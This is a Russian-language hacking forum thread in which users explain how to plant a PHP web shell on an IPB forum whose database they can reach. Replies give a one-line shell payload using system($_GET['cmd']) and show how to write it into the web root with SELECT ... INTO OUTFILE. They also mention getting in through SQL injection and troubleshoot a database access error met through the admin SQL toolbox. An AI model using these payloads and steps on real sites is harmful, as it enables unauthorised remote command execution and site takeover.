Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .
Сначала заносим в БД запись нашего шела типа <? system($_GET(cmd)) ?> Потом сохраняем в файл SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета надеюсь понятно?? Ван, ну наверно))ведь во всех версиях есть коннект к БД =))
2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения. Все выше перечисленное относится и к другим пользователям. Настчет темы добавлю к сообщению madnet'a SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME Подчеркнутым- полный путь к файлу.
Всё делаю как написано, в итоге пишет вот что: Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES) Что это такое и как с этим бароться=)?
Те что перевести трудно?? Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах. ВВести правильный пароль =)
Я в админке ИПБ 1. 3 , там есть такая функция: SQL Management >>> mySQL Toolbox>>>RUN QUERY И когда вбиваю всё что ты сказал, вылазиет эта шняга и каким образом я поменяю пароль, ты мне скажи=) Как можно кроме как через смайлы и мускул ещё залить шелл через этот движок?
